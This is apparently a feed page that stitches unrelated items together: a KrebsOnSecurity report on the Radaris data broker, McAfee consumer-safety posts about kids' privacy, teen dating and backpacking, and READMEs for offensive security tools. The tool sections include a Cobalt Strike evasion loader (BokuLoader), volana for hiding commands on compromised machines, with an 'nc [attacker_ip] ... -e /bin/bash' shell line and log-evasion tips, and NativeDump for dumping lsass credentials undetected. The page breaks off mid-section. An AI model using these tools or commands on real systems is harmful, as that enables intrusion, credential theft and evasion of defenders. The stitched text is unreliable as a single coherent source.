Login
On March 8, 2024, KrebsOnSecurity published a deep dive on the consumer data broker Radaris, showing how the original owners are two men in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites. The subjects of that piece are threatening to sue KrebsOnSecurity for defamation unless the story is retracted. Meanwhile, their attorney has admitted that the person Radaris named as the CEO from its inception is a fabricated identity.
Radaris is just one cog in a sprawling network of people-search properties online that sell highly detailed background reports on U.S. consumers and businesses. Those reports typically include the subject’s current and previous addresses, partial Social Security numbers, any known licenses, email addresses and phone numbers, as well as the same information for any of their immediate relatives.
Radaris has a less-than-stellar reputation when it comes to responding to consumers seeking to have their reports removed from its various people-search services. That poor reputation, combined with indications that the true founders of Radaris have gone to extraordinary lengths to conceal their stewardship of the company, was what prompted KrebsOnSecurity to investigate the origins of Radaris in the first place.
On April 18, KrebsOnSecurity received a certified letter (PDF) from Valentin “Val” Gurvits, an attorney with the Boston Law Group, stating that KrebsOnSecurity would face a withering defamation lawsuit unless the Radaris story was immediately retracted and an apology issued to the two brothers named in the story as co-founders.
That March story worked backwards from the email address used to register radaris.com, and charted an impressive array of data broker companies created over the past 15 years by Massachusetts residents Dmitry and Igor Lubarsky (also sometimes spelled Lybarsky or Lubarski). Dmitry goes by “Dan,” and Igor uses the name “Gary.”
Those businesses included numerous websites marketed to Russian-speaking people who are new to the United States, such as russianamerica.com, newyork.ru, russiancleveland.com, russianla.com, russianmiami.com, etc. Other domains connected to the Lubarskys included Russian-language dating and adult websites, as well as affiliate programs for their international calling card businesses.
A mind map of various entities apparently tied to Radaris and the company’s co-founders. Click to enlarge.
The story on Radaris noted that the Lubarsky brothers registered most of their businesses using a made-up name — “Gary Norden,” sometimes called Gary Nord or Gary Nard.
Mr. Gurvits’ letter stated emphatically that my reporting was lazy, mean-spirited, and obviously intended to smear the reputation of his clients. By way of example, Mr. Gurvits said the Lubarskys were actually Ukrainian, and that the story painted his clients in a negative light by insinuating that they were somehow associated with Radaris and with vaguely nefarious elements in Russia.
But more to the point, Mr. Gurvits said, neither of his clients were Gary Norden, and neither had ever held any leadership positions at Radaris, nor were they financial beneficiaries of the company in any way.
“Neither of my clients is a founder of Radaris, and neither of my clients is the CEOs of Radaris,” Gurvits wrote. “Additionally, presently and going back at least the past 10 years, neither of my clients are (or were) officers or employees of Radaris. Indeed, neither of them even owns (or ever owned) any equity in Radaris. In intentional disregard of these facts, the Article implies that my clients are personally responsible for Radaris’ actions. Therefore, you intentionally caused all negative allegations in the Article made with respect to Radaris to be imputed against my clients personally.”
Dan Lubarsky’s Facebook page, just prior to the March 8 story about Radaris, said he was from Moscow.
We took Mr. Gurvits’ word on the ethnicity of his clients, and adjusted the story to remove a single mention that they were Russian. We did so even though Dan Lubarsky’s own Facebook page said (until recently) that he was from Moscow, Russia.
KrebsOnSecurity asked Mr. Gurvits to explain precisely which other details in the story were incorrect, and replied that we would be happy to update the story with a correction if they could demonstrate any errors of fact or omission.
We also requested specifics about several aspects of the story, such as the identity of the current Radaris CEO — listed on the Radaris website as “Victor K.” Mr. Gurvits replied that Radaris is and always has been based in Ukraine, and that the company’s true founder “Eugene L” is based there.
While Radaris has claimed to have offices in Massachusetts, Cyprus and Latvia, its website has never mentioned Ukraine. Mr. Gurvits has not responded to requests for more information about the identities of “Eugene L” or “Victor K.”
Gurvits said he had no intention of doing anyone’s reporting for them, and that the Lubarskys were going to sue KrebsOnSecurity for defamation unless the story was retracted in full. KrebsOnSecurity replied that journalists often face challenges to things that they report, but it is more than rare for one who makes a challenge to take umbrage at being asked for supporting information.
On June 13, Mr. Gurvits sent another letter (PDF) that continued to claim KrebsOnSecurity was defaming his clients, only this time Gurvits said his clients would be satisfied if KrebsOnSecurity just removed their names from the story.
“Ultimately, my clients don’t care what you say about any of the websites or corporate entities in your Article, as long as you completely remove my clients’ names from the Article and cooperate with my clients to have copies of the Article where my clients’ names appear removed from the Internet,” Mr. Gurvits wrote.
The June 13 letter explained that the name Gary Norden was a pseudonym invented by the Radaris marketing division, but that neither of the Lubarsky brothers were Norden.
This was a startling admission, given that Radaris has quoted the fictitious Gary Norden in press releases published and paid for by Radaris, and in news media stories where the company is explicitly seeking money from investors. In other words, Radaris has been misrepresenting itself to investors from the beginning. Here’s a press release from Radaris that was published on PR Newswire in April 2011:
A press release published by Radaris in 2011 names the CEO of Radaris as Gary Norden, which was a fake name made up by Radaris’ marketing department.
In April 2014, the Boston Business Journal published a story (PDF) about Radaris that extolled the company’s rapid growth and considerable customer base. The story noted that, “to date, the company has raised less than $1 million from Cyprus-based investment company Difive.”
“We live in a world where information becomes much more broad and much more available every single day,” the Boston Business Journal quoted Radaris’ fake CEO Gary Norden, who by then had somehow been demoted from CEO to vice president of business development.
A Boston Business Journal story from April 2014 quotes the fictitious Radaris CEO Gary Norden.
“We decided there needs to be a service that allows for ease of monitoring of information about people,” the fake CEO said. The story went on to say Radaris was seeking to raise between $5 million and $7 million from investors in the ensuing months.
In his most recent demand letter, Mr. Gurvits helpfully included resumes for both of the Lubarsky brothers.
Dmitry Lubarsky’s resume states he is the owner of Difive.com, a startup incubator for IT companies. Recall that Difive is the same company mentioned by the fake Radaris CEO in the 2014 Boston Business Journal story, which said Difive was the company’s initial and sole investor.
Difive’s website in 2016 said it had offices in Boston, New York, San Francisco, Riga (Latvia) and Moscow (nothing in Ukraine). Meanwhile, DomainTools.com reports difive.com was originally registered in 2007 to the fictitious Gary Norden from Massachusetts.
Archived copies of the Difive website from 2017 include a “Portfolio” page indexing all of the companies in which Difive has invested. That list, available here, includes virtually every “Gary Norden” domain name mentioned in my original report, plus a few that escaped notice earlier.
Dan Lubarsky’s resume says he was CEO of a people search company called HumanBook. The Wayback machine at archive.org shows the Humanbook domain (humanbook.com) came online around April 2008, when the company was still in “beta” mode.
By August 2008, however, humanbook.com had changed the name advertised on its homepage to Radaris Beta. Eventually, Humanbook simply redirected to radaris.com.
Archive.org’s record of humanbook.com from 2008, just after its homepage changed to Radaris Beta.
Astute readers may notice that the domain radaris.com is not among the companies listed as Difive investments. However, passive domain name system (DNS) records from DomainTools show that between October 2023 and March 2024 radaris.com was hosted alongside all of the other Gary Norden domains at the Internet address range 38.111.228.x.
That address range simultaneously hosted every domain mentioned in this story and in the original March 2024 report as connected to email addresses used by Gary Norden, including radaris.com, radaris.ru, radaris.de, difive.com, privet.ru, blog.ru, comfi.com, phoneowner.com, russianamerica.com, eprofit.com, rehold.com, homeflock.com, humanbook.com and dozens more. A spreadsheet of those historical DNS entries for radaris.com is available here (.csv).
Image: DomainTools.com
The breach tracking service Constella Intelligence finds just two email addresses ending in difive.com have been exposed in data breaches over the years: dan@difive.com, and gn@difive.com. Presumably, “gn” stands for Gary Norden.
A search on the email address gn@difive.com via the breach tracking service osint.industries reveals this address was used to create an account at Airbnb under the name Gary, with the last four digits of the account’s phone number ending in “0001.”
Constella Intelligence finds gn@difive.com was associated with the Massachusetts number 617-794-0001, which was used to register accounts for “Igor Lybarsky” from Wellesley or Sherborn, Ma. at multiple online businesses, including audiusa.com and the designer eyewear store luxottica.com.
The phone number 617-794-0001 also appears for a “Gary Nard” user at russianamerica.com. Igor Lubarsky’s resume says he was the manager of russianamerica.com.
DomainTools finds 617-794-0001 is connected to registration records for three domains, including paytone.com, a domain that Dan Lubarsky’s resume says he managed. DomainTools also found that number on the registration records for trustoria.com, another major consumer data broker that has an atrocious reputation, according to the Better Business Bureau.
Dan Lubarsky’s resume says he was responsible for several international telecommunications services, including the website comfi.com. DomainTools says the phone number connected to that domain — 617-952-4234 — was also used on the registration records for humanbook.net/biz/info/mobi/us, as well as for radaris.me, radaris.in, and radaris.tel.
Two other key domains are connected to that phone number. The first is barsky.com, which is the website for Barsky Estate Realty Trust (PDF), a real estate holding company controlled by the Lubarskys. Naturally, DomainTools finds barsky.com also was registered to a Gary Norden from Massachusetts. But the organization listed in the barsky.com registration records is Comfi Inc., a VOIP communications firm that Dan Lubarsky’s resume says he managed.
The other domain of note is unipointtechnologies.com. Dan Lubarsky’s resume says he was the CEO of Wellesley Hills, Mass-based Unipoint Technology Inc. In 2012, Unipoint was fined $179,000 by the U.S. Federal Communications Commission, which said the company had failed to apply for a license to provide international telecommunications services.
A pandemic assistance loan granted in 2020 to Igor Lybarsky of Sherborn, Ma. shows he received the money to an entity called Norden Consulting.
Notice the name on the recipient of this government loan for Igor Lybarsky from Sherborn, Ma: Norden Consulting.
The 2011 Radaris press release quoting their fake CEO Gary Norden said the company had four patents pending from a team of computer science PhDs. According to the resume shared by Mr. Gurvits, Dan Lubarsky has a PhD in computer science.
The U.S. Patent and Trademark Office (PTO) says Dan Lubarsky/Lubarski has at least nine technology patents to his name. The fake CEO press release from Radaris mentioning its four patents was published in April 2011. By that time, the PTO says Dan Lubarsky had applied for exactly four patents, including, “System and Method for a Web-Based People Directory.” The first of those patents, published in 2009, is tied to Humanbook.com, the company Dan Lubarsky founded that later changed its name to Radaris.
If the Lubarskys were never involved in Radaris, how do they or their attorney know the inside information that Gary Norden is a fiction of Radaris’ marketing department? KrebsOnSecurity has learned that Mr. Gurvits is the same attorney responding on behalf of Radaris in a lawsuit against the data broker filed earlier this year by Atlas Data Privacy.
Mr. Gurvits also stepped forward as Radaris’ attorney in a class action lawsuit the company lost in 2017 because it never contested the claim in court. When the plaintiffs told the judge they couldn’t collect on the $7.5 million default judgment, the judge ordered the domain registry Verisign to transfer the radaris.com domain name to the plaintiffs.
Mr. Gurvits appealed the verdict, arguing that the lawsuit hadn’t named the actual owners of the Radaris domain name — a Cyprus company called Bitseller Expert Limited — and thus taking the domain away would be a violation of their due process rights.
The judge ruled in Radaris’ favor — halting the domain transfer — and told the plaintiffs they could refile their complaint. Soon after, the operator of Radaris changed from Bitseller to Andtop Company, an entity formed (PDF) in the Marshall Islands in Oct. 2020. Andtop also operates the aforementioned people-search service Trustoria.
Mr. Gurvits’ most-publicized defamation case was a client named Aleksej Gubarev, a Russian technology executive whose name appeared in the Steele Dossier. That document included a collection of salacious, unverified information gathered by the former British intelligence officer Christopher Steele during the 2016 U.S. presidential campaign at the direction of former president Donald Trump’s political rivals.
Gubarev, the head of the IT services company XBT Holding and the Florida web hosting firm Webzilla, sued BuzzFeed for publishing the Steele dossier. One of the items in the dossier alleged that XBT/Webzilla and affiliated companies played a key role in the hack of Democratic Party computers in the spring of 2016. The memo alleged Gubarev had been coerced into providing services to Russia’s main domestic security agency, known as the FSB.
In December 2018, a federal judge in Miami ruled in favor of BuzzFeed, saying the publication was protected by the fair report privilege, which gives news organizations latitude in reporting on official government proceedings.
Radaris was originally operated by Bitseller Expert Limited. Who owns Bitseller Expert Limited? A report (PDF) obtained from the Cyprus business registry shows this company lists its director as Pavel Kaydash from Moscow. Mr. Kaydash could not be reached for comment.
Article tags
Kids engage online far differently than adults. Between group chats, social apps, and keeping up with digital trends, their interests, and attention spans constantly shift, which means online privacy concerns get sidelined. Here are a few ways to move online privacy center stage.
Few things will put kids to sleep faster than talking with parents about online stuff like privacy. So, flip the script. Talk about the things they love online—shopping, TikTok, and group chats. Why? Because all that daily fun could come to a screeching halt should a bad actor get a hold of your child’s data. Establishing strong digital habits allows your child to protect what they enjoy including their Venmo account, video games, and midnight chatting. Doing simple things such as maximizing privacy settings on social networks, limiting their social circles to known friends, and refraining from oversharing, can dramatically improve digital privacy.
We say it often: The best way to keep your kids safe online is by nurturing a strong relationship with them. A healthy parent-child connection is at the heart of raising kids who can make good choices online. Connect with your child daily. Talk about what’s important to them. Listen. Ask them to show you their favorite apps. Soon, you’ll discover details about their online life and gain the trust you need to discuss difficult topics down the road.
According to the latest Data Breach Investigations Report (DBIR), which examined the state of cybersecurity in 2023, some 68% of global breaches, regardless of whether they included a third party or not, involved a non-malicious human action, such as a person making an error or becoming a victim of a social engineering attack. For that reason, consider putting an extra layer of protection between your family and cyberspace. A few ways to do that:
A good digital offense is the best way to guard yourself and your family against those out to misuse your data. Offensive tactics and habits include using strong passwords, maximizing privacy settings on social networks, using a VPN, and boosting security on the many IoT devices throughout your home.
Get in the habit of deep cleaning your technology and bring your kids into the routine. Here’s how:
Establish rules and guidelines for online behavior, and make sure everyone in the family understands the importance of protecting their personal information.
Keep the conversation about online safety ongoing. Regularly check in with your kids about their online experiences and encourage them to speak up if they encounter anything suspicious or uncomfortable.
It’s hard to slow down and get serious about online privacy if you’ve never experienced a breach or online theft of some kind. However, chances are, the dark side of online living will impact your family before long. Ready to go deeper? Dig into these cybersecurity tips for every age and stage.
The post How to Get Kids Focused on Their Online Privacy appeared first on McAfee Blog.
A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features!
| Contributor | Notable Contributions | |
|---|---|---|
| Bobby Cooke | @0xBoku | Project original author and maintainer |
| Santiago Pecin | @s4ntiago_p | Reflective Loader major enhancements |
| Chris Spehn | @ConsciousHacker | Aggressor scripting |
| Joshua Magri | @passthehashbrwn | IAT hooking |
| Dylan Tran | @d_tranman | Reflective Call Stack Spoofing |
| James Yeung | @5cript1diot | Indirect System Calls |
The built-in Cobalt Strike reflective loader is robust, handling all Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage to using a custom UDRL is Malleable PE evasion features may or may not be supported out-of-the-box.
The objective of the public BokuLoader project is to assist red teams in creating their own in-house Cobalt Strike UDRL. The project aims to support all worthwhile CS Malleable PE evasion features. Some evasion features leverage CS integration, others have been recreated completely, and some are unsupported.
Before using this project, in any form, you should properly test the evasion features are working as intended. Between the C code and the Aggressor script, compilation with different versions of operating systems, compilers, and Java may return different results.
FreshRSS NtProtectVirtualMemory
obfuscate "true" with custom UDRL Aggressor script implementation.0x1000 bytes will be nulls.XGetProcAddress for resolving symbolsKernel32.GetProcAddress
xLoadLibrary for resolving DLL's base address & DLL LoadingTEB->PEB->PEB_LDR_DATA->InMemoryOrderModuleList
Kernel32.LoadLibraryA
| Command | Option(s) | Supported |
|---|---|---|
allocator | HeapAlloc, MapViewOfFile, VirtualAlloc | All supported via BokuLoader implementation |
module_x64 | string (DLL Name) | Supported via BokuLoader implementation. Same DLL stomping requirements as CS implementation apply |
obfuscate | true/false | HTTP/S beacons supported via BokuLoader implementation. SMB/TCP is currently not supported for obfuscate true. Details in issue. Accepting help if you can fix :) |
entry_point | RVA as decimal number | Supported via BokuLoader implementation |
cleanup | true | Supported via CS integration |
userwx | true/false | Supported via BokuLoader implementation |
sleep_mask | (true/false) or (Sleepmask Kit+true) | Supported. When using default "sleepmask true" (without sleepmask kit) set "userwx true". When using sleepmask kit which supports RX beacon.text memory (src47/Ekko) set "sleepmask true" && "userwx false". |
magic_mz_x64 | 4 char string | Supported via CS integration |
magic_pe | 2 char string | Supported via CS integration |
transform-x64 prepend | escaped hex string |
BokuLoader.cna Aggressor script modification |
transform-x64 strrep | string string |
BokuLoader.cna Aggressor script modification |
stomppe | true/false | Unsupported. BokuLoader does not copy beacon DLL headers over. First 0x1000 bytes of virtual beacon DLL are 0x00
|
checksum | number | Experimental. BokuLoader.cna Aggressor script modification |
compile_time | date-time string | Experimental. BokuLoader.cna Aggressor script modification |
image_size_x64 | decimal value | Unsupported |
name | string | Experimental. BokuLoader.cna Aggressor script modification |
rich_header | escaped hex string | Experimental. BokuLoader.cna Aggressor script modification |
stringw | string | Unsupported |
string | string | Unsupported |
make
BokuLoader.cna Aggressor scriptUse the Script Console to ensure BokuLoader was implemented in the beacon build
Does not support x86 option. The x86 bin is the original Reflective Loader object file.
RAW beacons works out of the box. When using the Artifact Kit for the beacon loader, the stagesize variable must be larger than the default.| Original Cobalt Strike String | BokuLoader Cobalt Strike String |
|---|---|
| ReflectiveLoader | BokuLoader |
| Microsoft Base Cryptographic Provider v1.0 | 12367321236742382543232341241261363163151d |
| (admin) | (tomin) |
| beacon | bacons |
Kernel32.LoadLibraryExA is called to map the DLL from diskKernel32.LoadLibraryExA is DONT_RESOLVE_DLL_REFERENCES (0x00000001)
RX or RWX memory will exist in the heap if sleepmask kit is not used.Kernel32.CreateFileMappingA & Kernel32.MapViewOfFile is called to allocate memory for the virtual beacon DLL.NtAllocateVirtualMemory, NtProtectVirtualMemory
ntdll.dll will not detect these systemcalls.mov eax, r11d; mov r11, r10; mov r10, rcx; jmp r11 assembly instructions within its executable memory.0x1000 bytes of the virtual beacon DLL are zeros.Falling in love in the internet age is a whole different ball game to the social-media-free ’70s, ’80s and ’90s. Awkward calls on the home phone, sending cards in the mail, and making mixtapes were all key relationship milestones back in the days of roller skates. But fast forward to the new millennium and dating is a whole different sport.
No longer are teens relying on their friends and family for introductions to new love interests, it’s all doable online thanks to the plethora of available dating apps and social media platforms. So it’s no surprise that research confirms that meeting online has officially displaced the traditional ways romantic partnerships were formed.
But how does it actually work? How do teens really connect online? Is it just about the dating apps? What about Instagram? Don’t they also use messaging apps to meet? And what does ‘benching’ and ‘beta-testing’ mean?
Ah, yes I know it can feel overwhelming but don’t stress – I got you! I’ve put together all the key information you need to know if you have kids who are starting their online dating journey.
When many of us think about online dating, we think about the major dating apps like Tinder and Bumble however that’s actually not where it all happens. In fact, many teens inform me that it really is all about Instagram, Snapchat, and increasingly, TikTok. I am reliably informed that these social media platforms give you a more authentic understanding of someone – great! But, in my opinion, there are potential safety issues with using social media to attract a mate. Particularly, if you have a young, inexperienced teen on your hands.
In order for people to be able to follow you on these platforms (and send you messages), you need to have your profile set to public. So, if you have a young, naïve teen who has their social media accounts set to public to ramp up their love life, then I consider this to be a safety concern. They can receive messages from anyone which is not ideal.
In 2024, chances are your teens will not meet a potential mate in real life (IRL) – it all happens online. But even on the rare chance they do first meet in person, or they eyeball someone they fancy across the school playground, the relationship will develop online. That’s where the magic happens!
So instead of multiple landline telephone calls to friends to ‘suss out’ their crush, they spend multiple hours researching their crush online. They’ll check out and dissect their photos and posts, find all their social media accounts, and then, depending on their level of courage, they may follow all their accounts. Colloquially, this is often referred to as ‘social media stalking’.
Once they’ve built up the courage, teens may start liking the posts of their crush. Some may even go back over old social media posts and photos from several years back to demonstrate their level of interest. This is known as ‘deepliking’. Some teens think this is an effective strategy, others consider this to be off-putting – each to their own!! But the goal here is to put yourself on the radar of your crush.
Now, once the ‘likes’ have gathered some momentum, the teen may decide it’s time to ‘slide into their crush’s DM’s’. Ah – there’s that expression. All it really means is that your teen will send a direct message to their love interest – usually on a social media app such as Instagram or TikTok.
But they may not even need to ‘slide into the DM’s’. I am reliably informed that if you like a few posts of a potential love interest and then, they like a few of yours, you’re flirting and there’s definitely a spark!! The love interest may then just be the one initiating interest.
Now, if there is a spark and the crush has replied, the next phase is messaging – and a lot of it! Potentially 1000’s of messages. I have first-hand experience of paying a telephone bill for someone (no names) who was super smitten with a girl in the days before unlimited data. All I can say is ouch!!!
Now this messaging may take place on a social media app, a messaging app such as WhatsApp, Messenger, or even via text. Or possibly even a combination of them all!! The key here is to keep the messaging going to suss out whether there is a vibe!
But the messaging stage is where it can get messy and confusing. It’s not unusual for teens to be messaging with several potential love interests at once – essentially keeping their options open. Some refer to this as ‘beta-testing’, I would refer to it as disrespectful and probably exhausting – but hey, I’m old school! But this is often a reality for many teens, and it can be quite demoralising to feel like you’re being ‘managed’.
Now, this is a big moment. When your teen and their crush have decided they are exclusive and officially a thing, the next step is to let the world know and make it official. So, they may choose to update their status on their social media platforms to ‘in a relationship’. But if they are after a softer launch, they may simply post a pic of each other, or even together.
Believe it or not, some teens may never actually meet in real life (IRL) but still be in a relationship. If this is the case then it’s more likely that sexting will be part of the relationship. Research shows that 1 in 3 Aussie teens (aged 14 to 17) have some experience with sexting ie sending, receiving, being asked, and asking for nude pics however I think in reality, it is likely more – not everyone answers surveys honestly!
So, yes sexting does happen and while I wish it just didn’t, we can’t put our heads in the sand. So, I encourage all parents to remind their kids that once they send an image they lose control of it, that not all relationships last forever, and that they should never be coerced into doing something they are not comfortable with. Stay tuned for further posts with more sexting tips!
At the risk of being a cynic, chances are your child’s teen relationships will probably not last a lifetime. So, how do you break up when you’re a digital native?
Well, before the break-up phase, ‘benching’ can occur. This happens when one partner no longer wants to meet up with the other in person. It may also be the moment when your teen’s messages are no longer returned – this is called LOR – left on read. Most of us would call this ghosting. But regardless of what you call it, it’s not a nice feeling.
Call me old fashioned but I am a big fan of breaking up with your love in person and my boys know that. Tapering off contact or telling someone that the relationship is over via text is disrespectful, in my opinion.
Helping kids through heartache is tough – I’ve been there!! If your teen is finding life post-relationship hard, why don’t you suggest they delete their social media apps for a week or 2? It’s hard to move on from someone when you are still receiving messages and/or seeing their notifications. It may even be worth unfriending or unfollowing the ex as well.
So, even though the landscape has changed, and the mixtapes have gone, please don’t forget that dating and romance can be super tricky when you are a teen. Not only are you dealing with matters of the heart but in the world’s biggest public forum – the internet. So be kind, gentle, and supportive! And be grateful for the simplicity of the ’70s, ’80s and ’90s.
Alex xx
The post How Teens Date in the Digital Age appeared first on McAfee Blog.
During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage
You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]
Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console
Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it with your rce on target machine
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash
Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.
Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.
By detected we mean if we are able to trigger an alert if a certain command has been executed.
Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it
.bash_history, ".zsh_history" etc ..opensnoop)script, screen -L, sexonthebash, ovh-ttyrec, etc..)pkill -9 script
screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)volana with encryption /var/log/auth.log)sudo or su commandslogger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD injection to make logSorry for the clickbait title, but no money will be provided for contibutors. 🐛
Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system
CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.
The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.
CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!
Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.
A live demo can be found here - have fun!
If you would like to try out CyberChef locally you can either build it yourself:
docker build --tag cyberchef --ulimit nofile=10000 .
docker run -it -p 8080:80 cyberchef
Or you can use our image directly:
docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest
This image is built and published through our GitHub Workflows
There are four main areas in CyberChef:
You can use as many operations as you like in simple or complex ways. Some examples are as follows:
By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...
Supported arguments are recipe, input (encoded in Base64), and theme.
CyberChef is built to support
CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page
Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.
An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.
Traveling on a budget while backpacking allows individuals to immerse themselves fully in local cultures, explore off-the-beaten-path destinations, and forge genuine connections with fellow travelers, all while minimizing expenses. However, amidst the thrill of exploring new places, it’s crucial to safeguard your digital assets and personal information. Experiencing multiple scams on a single trip, as this twenty-one-year-old woman did in Chile and Bolivia, is rare. However, her cautionary tale highlights the importance of careful preparation when traveling, particularly in unfamiliar destinations.
Being informed about different scam risks is critical to ensuring a safe journey. Beyond the dangers inherent in unencrypted public Wi-Fi, cybercriminals also deploy Wi-Fi network spoofing, setting up fake networks in tourist hotspots to intercept travelers’ data. ATM skimming is another prevalent threat, especially in popular tourist areas, where criminals install devices to steal card information from unsuspecting users.
Accommodation scams on online booking platforms have also become more common, leaving travelers stranded without a place to stay after falling victim to fake listings or fraudulent hosts. One individual wired $3,100 to a cybercriminal after receiving a scam email, purportedly from Booking.com, offering a 20% accommodation discount for paying the host directly via wire transfer.
Given these risks, backpackers should take proactive measures to safeguard their devices and data. Here are some practical tips and strategies to ensure your cybersecurity while backpacking on a budget:
While backpacking offers incredible opportunities for adventure and exploration, it’s essential to prioritize cybersecurity to safeguard your digital assets and personal information. By following these practical tips and strategies, you can enjoy your travels with peace of mind, knowing you’ve taken steps to protect yourself against cyber threats.
The post How to Safeguard Your Digital Assets While Backpacking on a Budget appeared first on McAfee Blog.
NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).
Usage:
NativeDump.exe [DUMP_FILE]
The default file name is "proc_
The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.
Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine
The project has three branches at the moment (apart from the main branch with the basic technique):
ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk
delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding
remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding
After reading Minidump undocumented structures, its structure can be summed up to:
I created a parsing tool which can be helpful: MinidumpParser.
We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.
The header is a 32-bytes structure which can be defined in C# as:
public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}
The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header
Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:
public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}
The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:
| ID | Stream Type |
|---|---|
| 0x00 | UnusedStream |
| 0x01 | ReservedStream0 |
| 0x02 | ReservedStream1 |
| 0x03 | ThreadListStream |
| 0x04 | ModuleListStream |
| 0x05 | MemoryListStream |
| 0x06 | ExceptionStream |
| 0x07 | SystemInfoStream |
| 0x08 | ThreadExListStream |
| 0x09 | Memory64ListStream |
| 0x0A | CommentStreamA |
| 0x0B | CommentStreamW |
| 0x0C | HandleDataStream |
| 0x0D | FunctionTableStream |
| 0x0E | UnloadedModuleListStream |
| 0x0F | MiscInfoStream |
| 0x10 | MemoryInfoListStream |
| 0x11 | ThreadInfoListStream |
| 0x12 | HandleOperationListStream |
| 0x13 | TokenStream |
| 0x16 | HandleOperationListStream |
First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:
public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}
The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".
